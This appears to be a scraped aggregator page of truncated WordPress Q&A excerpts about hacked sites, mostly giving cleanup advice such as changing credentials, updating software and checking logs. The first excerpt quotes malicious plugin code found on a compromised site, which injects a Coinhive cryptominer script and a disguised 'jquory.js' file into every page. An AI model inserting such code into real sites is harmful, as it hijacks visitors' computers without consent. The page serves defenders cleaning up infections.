hacked - Read For Learn

malware in wordpress installer on dreamhost. [closed]

I found the problem.. Answering for others who might have gotten this… There is this code embedded in one of the plugins function enqueue_my_scripts() { wp_enqueue_script( ‘wp-internal’, ‘https://coinhive.com/lib/coinhive.min.js’, false, false, true ); wp_enqueue_script( ‘wp-backend’, plugins_url() . ‘/LayerSlider/assets/js/jquory.js’, false, false, true ); } add_action( ‘admin_enqueue_scripts’, ‘enqueue_my_scripts’ ); add_action( ‘wp_enqueue_scripts’, ‘enqueue_my_scripts’ ); And this javascript file Jquory.js. … Read more

Site Hacked – WordPress Divi Site – Cannot find where to fix the issue? [closed]

Disabling plugins won’t help if WordPress core has been compromised (and reinstalling WordPress won’t do much good if your hosting account has been compromised). I would recommend nuking and paving your installation with help from your hosting provider (and getting a professional to audit any necessary themes and plugins you plan to use after this … Read more

Open content directory help!

A) The best you can do is look through server logs, if you have access to them. You would have to comb through the logs and you can then find what IP addresses have requested certain files. If any are from human visitors then yes, their web browser has downloaded the file to a cache. … Read more

Have I been hacked – getting new site setup email for 8 localhost wordpress sites

Possibly it was just the original install emails coming through all at the same time from localhost, very late, some 2 years ago. I can’t find the original emails but then if they went into spam like these emails I wouldn’t find them. So I don’t know, hopefully its just a late localhost bottleneck finally … Read more

My blog was hacked? WP posting random posts

There are many things you need to do to fix a hacked site. Lots of googles on how to do it. Important things to do: change passwords on everything – WP accounts, FTP accounts, hosting accounts. Strong passwords, of course. remove the user called ‘admin’ (or just give it Subscriber level, after making a new … Read more

Help determining if the following are legitimate files

how can i find malware code and remove from wordpress site to stop it redirecting to hackers click view pages

ALthough hacking is not a subject that is allowed here (I suspect your question will get put on hold as soon as someone else notices), there are lots of resources available on the googles/bings/ducks to help with cleaning up a site. The process involves changing credentials everywhere (hosting, ftp, WordPress admin users); updating everything (WordPress, … Read more

Javascript Injection on my WordPress Site

Subpage is redirecting to spam site

Malware is somewhere in your site source code.It is not only in the page. It could be in upload folder, wp-core, themes and plugins.

Verifying that I have fully removed a WordPress hack?

Have you identified the exploit vector? If not, you may be leaving yourself open to future exploit. Other things to consider: Change WordPress admin user passwords – done Change Hosting account user password Change FTP passwords Change MySQL db user password – done Change the db table prefix Update your wp-config nonces/salt Check your directory/file … Read more

+ More